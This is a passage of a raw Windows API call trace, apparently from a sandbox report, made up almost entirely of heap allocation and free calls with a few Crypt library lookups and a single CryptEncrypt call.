dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0209.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0209.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0209.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0209.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0209.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0209.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0209.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0209.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0209.685] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0209.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0209.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0209.685] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50bd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0209.686] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0209.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0209.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0209.686] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f387a8*, pdwDataLen=0x8cef60*=0x6d22, dwBufLen=0x6d28 | out: pbData=0x2f387a8*, pdwDataLen=0x8cef60*=0x6d28) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0209.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0209.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0209.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0209.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0209.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0209.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0209.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0209.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0209.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0209.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0209.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0209.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0209.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0209.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0209.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0209.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0209.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0209.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0209.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0209.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0209.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0209.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0209.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0209.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0209.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0209.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0209.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0209.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0209.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0209.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0209.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d28) returned 0x2f3f4d8 [0209.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0209.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0209.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0209.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0209.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0209.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0209.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d28) returned 0x2f46208 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3f4d8 | out: hHeap=0x970000) returned 1 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0209.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0209.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0209.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0209.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0209.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0209.694] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0209.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0209.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0209.695] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0209.695] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0209.695] HeapFree (in: hHeap=0x970000, 